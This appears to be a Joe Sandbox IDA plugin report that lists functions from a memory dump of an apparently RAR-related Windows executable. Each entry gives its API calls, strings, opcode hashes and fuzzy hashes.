Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: swprintf
String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
API String ID: 233258989-622958660
Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
Instruction ID: 82ad8eb166f5d2760bb7ad6718ad28f677deff7a8f063566e581e0ad36dac15c
Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
Instruction Fuzzy Hash: D45107F3E386448AE3648F1CE841BA926E1F764F91F545A29F94AD3B44CA3DDA44C700

Function 00007FF695CE6E84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

wcschr.LIBVCRUNTIME ref: 00007FF695CE6EC8
wcschr.LIBVCRUNTIME ref: 00007FF695CE6F16

Strings

MCAOmcao, xrefs: 00007FF695CE6EC1
MCAOmcao, xrefs: 00007FF695CE6F0F

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: wcschr
String ID: MCAOmcao$MCAOmcao
API String ID: 1497570035-1725859250
Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
Instruction ID: 6dbbb26446379dfd1b852c714891ede3eeb522df3f5ebcb509b6eab97226511e
Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
Instruction Fuzzy Hash: D741AE13D0C5C3C0FA359B60A15267D62F1EF11FC4F5851B9EA5D862D6EE2EEC988321

Function 00007FF695CF3528 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF695CF359E
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CF35E6

Part of subcall function 00007FF695CF30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF695CF305D,?,?,?,?,?,?,?,?,00007FF695D04126,?,?,?,?,00000800), ref: 00007FF695CF30F0
Part of subcall function 00007FF695CF30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF695D04126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF695CF3119

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CF3651

Strings

%u.%03u, xrefs: 00007FF695CF35A7, 00007FF695CF3630

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AttributesFileswprintf$CurrentProcess
String ID: %u.%03u
API String ID: 2814246642-1114938957
Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
Instruction ID: cff303ce534d97a5588f056c0bd59be04c7825aaf5f7ff296902ea65cfcfe1f2
Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
Instruction Fuzzy Hash: BB313B6261858192E7249B24E5112BA67A0FB84FB4F501336ED7E877E1DF3DD94AC700

Function 00007FF695D37854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF695D3793A
WriteFile.KERNEL32 ref: 00007FF695D3796D
GetLastError.KERNEL32 ref: 00007FF695D3798F

Strings

U, xrefs: 00007FF695D37918

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
Instruction ID: 974b2713bb9aee270d596253865a33f9e74b358e802960c1b0f3b25df7b485d8
Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
Instruction Fuzzy Hash: 4641C322B19A41C2EB208F25E8443BAB7A1FB88B84F415231EE4DC7794EF3CD905C754

Function 00007FF695D2D7BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695D2E7D0: __vcrt_getptd_noexit.LIBVCRUNTIME ref: 00007FF695D2E7D4

__DestructExceptionObject.LIBVCRUNTIME ref: 00007FF695D2D7E2
RaiseException.KERNEL32 ref: 00007FF695D2D80B
__DestructExceptionObject.LIBVCRUNTIME ref: 00007FF695D2D86C

Strings

csm, xrefs: 00007FF695D2D83F

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
String ID: csm
API String ID: 2280078643-1018135373
Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
Instruction ID: 231420ea2577cc2a75007ea2550f6566768949fd84484f8a89c07a9857e9b3c6
Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
Instruction Fuzzy Hash: CA212B7A60864186E630DB15E04026EB7A1FB88FA5F002375DE9D47B95CF3DE84BCB45

Function 00007FF695D042CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695D0430F
wcschr.LIBVCRUNTIME ref: 00007FF695D0432C
wcschr.LIBVCRUNTIME ref: 00007FF695D0433C

Strings

%c:\, xrefs: 00007FF695D04302

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: wcschr$swprintf
String ID: %c:\
API String ID: 1303626722-3142399695
Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
Instruction ID: c32cf754ba69282437a5846e8193c7ad8985abb3496a51fe7fbd4a4e11ab39d6
Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
Instruction Fuzzy Hash: CE116312A4874181EE346F21950147DA3B0EF45FD0B58A6B6DF6E837E6DF3CF8698204

Function 00007FF695D1B780 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF695D1B7C0
CreateSemaphoreW.KERNEL32 ref: 00007FF695D1B7D0
CreateEventW.KERNEL32 ref: 00007FF695D1B7E7

Strings

Thread pool initialization failed., xrefs: 00007FF695D1B803

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
Instruction ID: ae2eb6ba33c7d7879fd77b1d0810fc89ce0697b69d6ea72327c7f8ac83103569
Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
Instruction Fuzzy Hash: 95110632B1564186F7248F21E4453B933E2EBC4F48F089139CA4D4B299CF3D985AC784

Function 00007FF695D22984 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF695D22B96
_CxxThrowException.LIBVCRUNTIME ref: 00007FF695D22BA7

Part of subcall function 00007FF695D2BA34: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF695D2B313), ref: 00007FF695D2BAB1
Part of subcall function 00007FF695D2BA34: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF695D2B313), ref: 00007FF695D2BAF0

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF695D22BB2
_CxxThrowException.LIBVCRUNTIME ref: 00007FF695D22BC3

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
String ID:
API String ID: 904936192-0
Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
Instruction ID: 4171aae0aedbb2dc4d4b709e2995d321827510c3faccdb1db3b8a5ea847f5f8d
Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
Instruction Fuzzy Hash: 7C51D162A19A8181EB24CF25D4503AC73A1FBC4F94F049231DE9EC77A9DF79D91AC304

Function 00007FF695CF3818 Relevance: 6.1, APIs: 4, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF695CEF6FC,00000000,?,?,?,?,00007FF695CF097D), ref: 00007FF695CF38CD
CreateFileW.KERNEL32(?,?,?,?,?,00007FF695CEF6FC,00000000,?,?,?,?,00007FF695CF097D,?,?,00000000), ref: 00007FF695CF391F
SetFileTime.KERNEL32(?,?,?,?,?,00007FF695CEF6FC,00000000,?,?,?,?,00007FF695CF097D,?,?,00000000), ref: 00007FF695CF399B
CloseHandle.KERNEL32(?,?,?,?,?,00007FF695CEF6FC,00000000,?,?,?,?,00007FF695CF097D,?,?,00000000), ref: 00007FF695CF39A6

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
Instruction ID: 1665c1f9e61186b08caf2ebfa67900e5599847b6fda6adb1691ed7510eceb9d0
Opcode Fuzzy Hash: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
Instruction Fuzzy Hash: 2C41D223B0C641A2FA708B11A41077A66F0FB81FA4F105275EE9D877D4DE7CD9498B00

Function 00007FF695D20244 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF695D203D3
_CxxThrowException.LIBVCRUNTIME ref: 00007FF695D203E4
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF695D203EF
_CxxThrowException.LIBVCRUNTIME ref: 00007FF695D20400

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
Instruction ID: 0514284321ef90d6227e7afa3b8267e25500ce96a339a73ecbc100cce1d25687
Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
Instruction Fuzzy Hash: 5A419462A0DAC285EB71DA21D0503BD63D0EF50F84F1856B2DB4D86699DF6CEC4A8398

Function 00007FF695D35120 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D35173
WideCharToMultiByte.KERNEL32 ref: 00007FF695D35245
GetLastError.KERNEL32 ref: 00007FF695D35268
_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D3529A

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
Instruction ID: cad716aa996f99d4572039a28602682cf5acc0d0c1812a032ea02f73be5dad77
Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
Instruction Fuzzy Hash: 60415122A0E78246FB758B50D044379B7E1EF40F98F1462B0DA4987AD9DF3CEC498748

Function 00007FF695CED048 Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00007FF695CD86CB,?,?,?,00007FF695CDA5CB,?,?,00000000,?,?,00000040,?,?,00007FF695CD2DF9), ref: 00007FF695CED09D
CreateFileW.KERNEL32(?,00007FF695CD86CB,?,?,?,00007FF695CDA5CB,?,?,00000000,?,?,00000040,?,?,00007FF695CD2DF9), ref: 00007FF695CED0E5
CreateFileW.KERNEL32(?,00007FF695CD86CB,?,?,?,00007FF695CDA5CB,?,?,00000000,?,?,00000040,?,?,00007FF695CD2DF9), ref: 00007FF695CED114
CreateFileW.KERNEL32(?,00007FF695CD86CB,?,?,?,00007FF695CDA5CB,?,?,00000000,?,?,00000040,?,?,00007FF695CD2DF9), ref: 00007FF695CED15C

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
Instruction ID: aca1661237014b6d9b3af60380c95a0e9c9888183f907f1e8ef1afa319a3b334
Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
Instruction Fuzzy Hash: 8B314932618B4582E7708F11E5557AA77E0F789BA8F505329EEAC47BC8CF3CD8488B44

Function 00007FF695D3978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF695D33CEF,?,?,00000000,00007FF695D33CAA,?,?,00000000,00007FF695D33FD9), ref: 00007FF695D397A5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF695D33CEF,?,?,00000000,00007FF695D33CAA,?,?,00000000,00007FF695D33FD9), ref: 00007FF695D39807
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF695D33CEF,?,?,00000000,00007FF695D33CAA,?,?,00000000,00007FF695D33FD9), ref: 00007FF695D39841
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF695D33CEF,?,?,00000000,00007FF695D33CAA,?,?,00000000,00007FF695D33FD9), ref: 00007FF695D3986B

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

